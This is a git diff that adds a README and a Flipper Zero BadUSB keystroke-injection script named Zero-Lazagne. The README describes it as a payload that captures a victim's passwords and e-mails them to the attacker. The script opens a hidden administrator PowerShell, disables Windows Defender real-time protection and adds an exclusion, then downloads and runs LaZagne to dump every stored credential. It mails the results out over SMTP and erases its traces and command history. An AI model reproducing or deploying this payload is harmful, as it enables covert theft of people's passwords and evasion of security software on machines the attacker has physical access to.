diff --git a/BadUSB/Zero-Lazagne/README.md b/BadUSB/Zero-Lazagne/README.md new file mode 100644 index 000000000..e06f2e27a --- /dev/null +++ b/BadUSB/Zero-Lazagne/README.md @@ -0,0 +1,4 @@ +# Zero-Lazagne +Bad Usb payload capable to capture victim's passwords (hiding powershell) and e-mailing them to you. Inspired by "Hasta Lasagna!", developed by [m4ki3lf0](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/credentials/Hasta%20lasagna!) for Rubber Ducky, and optimized for Flipper Zero. You'll need only the .txt file for the exfiltration. +## Notes +Tested with Unleashed Firmware and a SMTP without SSL (port 25) to send the e-mail. The 2.4.2 version of lazagne.exe is a bit faster, anyway it's possibile to replace the download link with the latest version. diff --git a/BadUSB/Zero-Lazagne/Zero-Lazagne.txt b/BadUSB/Zero-Lazagne/Zero-Lazagne.txt new file mode 100644 index 000000000..3a523ef97 --- /dev/null +++ b/BadUSB/Zero-Lazagne/Zero-Lazagne.txt @@ -0,0 +1,76 @@ +REM Open Powershell as Admin +DEFAULT_DELAY 300 +DELAY 1000 +GUI r +STRING powershell +CTRL-SHIFT ENTER +DELAY 2000 +LEFT +ENTER +DELAY 1000 +REM +REM Hide Powershell (Remember to extract Flipper only when it displays 100%) +STRING PowerShell.exe -WindowStyle hidden +ENTER +REM +REM Disable real time protection +STRING Set-MpPreference -DisableRealtimeMonitoring $true +ENTER +REM +REM Create a tmp directory in Downloads folder +STRING $dir = "C:\Users\$env:UserName\Downloads\tmp" +ENTER +STRING New-Item -ItemType Directory -Path $dir +ENTER +REM +REM Add an exception to Windows Defender for the tmp directory +STRING Add-MpPreference -ExclusionPath $dir +ENTER +REM +REM Hide the directory +STRING $hide = Get-Item $dir -Force +ENTER +STRING $hide.attributes='Hidden' +ENTER +REM +REM Download the executable (version 2.4.2 is a bit faster, you can change the download link to the latest version) +STRING Invoke-WebRequest -Uri "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.2/lazagne.exe" -OutFile "$dir\lazagne.exe" +ENTER +REM +REM Execute lazagne.exe and save output to a file +STRING & "$dir\lazagne.exe" all > "$dir\output.txt" +ENTER +REM +REM Mail Exfiltration +STRING $smtp = "INSERT YOUR SMTP HERE" +ENTER +STRING $From = "INSERT YOUR EMAIL HERE" +ENTER +STRING $To = "INSERT RECEIVER EMAIL HERE" +ENTER +STRING $Subject = "Zero-Lazagne Report" +ENTER +STRING $Body = "Hi, here is the Report" +ENTER +STRING $Password = "INSERT YOUR PASSWORD HERE" | ConvertTo-SecureString -AsPlainText -Force +ENTER +STRING $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $From, $Password +ENTER +REM +REM Send the mail. Tested without SSl. You can try to add "-Use Ssl" and change the port (465 or 587 based on your SMTP) +STRING Send-MailMessage -From $From -To $To -Subject $Subject -Body $Body -Attachments "$dir\output.txt" -SmtpServer $smtp -port 25 -Credential $Credential +ENTER +REM +REM Clean up +STRING Remove-Item -Path $dir -Recurse -Force +ENTER +STRING Set-MpPreference -DisableRealtimeMonitoring $false +ENTER +STRING Remove-MpPreference -ExclusionPath $dir +ENTER +REM +REM Remove the script from the system and exit from powershell +STRING Clear-History +ENTER +STRING exit +ENTER